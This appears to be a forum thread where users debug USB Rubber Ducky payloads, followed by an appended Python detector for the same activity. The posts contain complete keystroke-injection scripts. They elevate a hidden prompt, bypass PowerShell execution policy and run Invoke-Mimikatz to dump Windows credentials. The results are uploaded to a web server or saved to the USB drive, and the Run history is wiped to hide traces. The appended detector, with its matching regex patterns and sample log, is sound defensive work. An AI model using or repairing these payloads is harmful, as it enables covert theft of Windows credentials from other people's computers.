Mr.X (Members, 3 posts)

Posts posted by Mr.X

  1. Greetings,

    I have been toying around with my Rubber Ducky for a couple of days now and have been doing some tests, mostly on Windows 10 64-bit. I am currently running twinduck version c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the Windows password of the current user and save it onto the ducky itself, but none have worked yet.

    I also tried out the web server method with a locally hosted apache2 web server (replacing the x's with my actual local address):

    DELAY 1000
    REM Open an admin command prompt 
    GUI r
    DELAY 500
    STRING powershell Start-Process cmd -Verb runAs
    ENTER
    DELAY 2000
    ALT y
    DELAY 1000
    REM Obfuscate the command prompt
    STRING mode con:cols=18 lines=1
    ENTER
    STRING color FE
    ENTER
    REM Download and execute Invoke Mimikatz then upload the results
    STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)"
    ENTER
    DELAY 15000
    REM Clear the Run history and exit
    STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
    ENTER
    STRING exit
    ENTER

    I can access both files from the targeted system with my browser, so the web server is working fine. I am listening with netcat ('nc -l -p 80') but it never receives the data. What am I doing wrong here?

  2. On 9/14/2016 at 2:50 PM, EvilTtaM said:

    I attached the Ducky Code I used, If there are any suggestions for changes please let me know. I will add that this code assumes that the executionpolicy is set to bypass, however it could be written in to change that. 

    15secondhack.txt

    Your version doesn't bypass the running scripts restriction. I get something like "running scripts is disabled on this machine", which means it can't execute the mimikatz script. Did you fix that yet?

  3. On 10/26/2016 at 3:39 AM, 0x41414141 said:

    Here's a version for the Twin Duck. Make sure you leave the ducky plugged in long enough for the creds file to be written in the background.

    DELAY 1000
    GUI r
    DELAY 500
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
    ENTER
    DELAY 2000
    ALT y
    DELAY 1000
    STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCK"') do @set duck=%d
    ENTER
    DELAY 500
    STRING if exist %duck%\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';"
    ENTER


    I ran it together with the correct im.ps1 on a Windows 10 machine (yes, my USB is named 'DUCK'). The commands ran properly until the last STRING, I think; then the PowerShell session just did nothing and hung on the last string. A file was never created, so I am assuming mimikatz didn't even run. Could it be the case sensitivity in 'do @set duck=%d' and %duck%? I have the feeling the last IF isn't executed because it returns False.
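From the defender's side, the three payloads quoted in this thread share a recognisable shape in process-creation telemetry: a PowerShell launch with the execution policy bypassed and the window hidden, a download-and-execute cradle or an Invoke-Mimikatz call, and a RunMRU wipe to cover the Run dialog. The following Python scorer is an added example, not code from the thread or from any of the posters; it runs over constructed log lines in an assumed "timestamp host user command-line" format (not a real product's schema), the host names and indicator weights are assumptions, and 192.0.2.10 is a documentation-range placeholder standing in for the x'd-out address in the first post.

```python
"""Score process-creation command lines for the Ducky/mimikatz pattern discussed above.

Constructed example: log format, host names and weights are assumptions for
illustration. Indicator patterns mirror strings visible in the quoted payloads.
"""
import re

# (indicator name, weight, pattern). Weights are an assumption: one strong
# indicator or several weak ones together should cross ALERT_THRESHOLD.
INDICATORS = [
    ("execution_policy_bypass", 2, re.compile(r"-Exec(?:utionPolicy)?\s+Bypass", re.I)),
    ("hidden_window",           1, re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I)),
    ("download_cradle",         3, re.compile(r"(?:\bIEX\b|Invoke-Expression)[^\n]*DownloadString", re.I)),
    ("mimikatz_invoke",         5, re.compile(r"Invoke-Mimikatz|-DumpCreds", re.I)),
    ("runmru_wipe",             2, re.compile(r"(?:reg\s+delete|Remove-ItemProperty)[^\n]*RunMRU", re.I)),
    ("console_shrink",          1, re.compile(r"mode\s+con\b[^\n]*(?:cols|lines)=\d+", re.I)),
    ("volume_label_hunt",       1, re.compile(r"wmic\s+volume\s+get\s+driveletter", re.I)),
]
ALERT_THRESHOLD = 4  # assumption

# Constructed sample log: "timestamp host user command-line" per line.
# Lines 3, 4 and 6 mirror the payload strings quoted in this thread; the rest
# are benign or admin activity that shares only weak indicators with them.
SAMPLE_LOG = r'''
2016-10-27T10:15:02Z WS01 alice powershell.exe -Command Get-ChildItem C:\Users
2016-10-27T10:16:10Z WS01 alice cmd.exe /c mode con cols=120 lines=40
2016-10-27T10:20:33Z WS01 alice powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://192.0.2.10/rx.php', $output)"
2016-10-27T10:31:05Z WS02 bob powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
2016-10-27T10:31:08Z WS02 bob cmd.exe /c for /f %d in ('wmic volume get driveletter, label|findstr "DUCK"') do @set duck=%d
2016-10-27T10:31:09Z WS02 bob powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module E:\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File 'E:\WS02_creds.txt';"
2016-10-27T11:02:44Z SRV01 svc_backup powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1
2016-10-27T11:05:12Z WS01 alice powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
'''


def match_indicators(cmdline):
    """Return the names of all indicators whose pattern appears in cmdline, in table order."""
    return [name for name, _w, rx in INDICATORS if rx.search(cmdline)]


def score(cmdline):
    """Sum the weights of the indicators matched by cmdline."""
    hits = set(match_indicators(cmdline))
    return sum(w for name, w, _rx in INDICATORS if name in hits)


def parse_event(line):
    """Split 'timestamp host user command-line'; the command line keeps its own spaces."""
    ts, host, user, cmdline = line.split(None, 3)
    return {"ts": ts, "host": host, "user": user, "cmdline": cmdline}


def scan(log_text, threshold=ALERT_THRESHOLD):
    """Return one alert dict per event whose score reaches the threshold."""
    alerts = []
    for line in log_text.strip().splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        s = score(ev["cmdline"])
        if s >= threshold:
            alerts.append({**ev, "score": s, "indicators": match_indicators(ev["cmdline"])})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f'{a["ts"]} {a["host"]} {a["user"]} score={a["score"]} {",".join(a["indicators"])}')
```

Running the block alerts on three of the eight sample events: the download-and-execute line from the first post and the Import-Module line from the Twin Duck version each score 8 on the cradle/mimikatz indicators, and the hidden, policy-bypassing launcher that wipes RunMRU scores 6 from four weak-to-medium indicators combined. The legitimate backup script that only bypasses the execution policy, and the lone RunMRU cleanup, stay below the threshold, which is the point of weighting rather than alerting on any single string.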
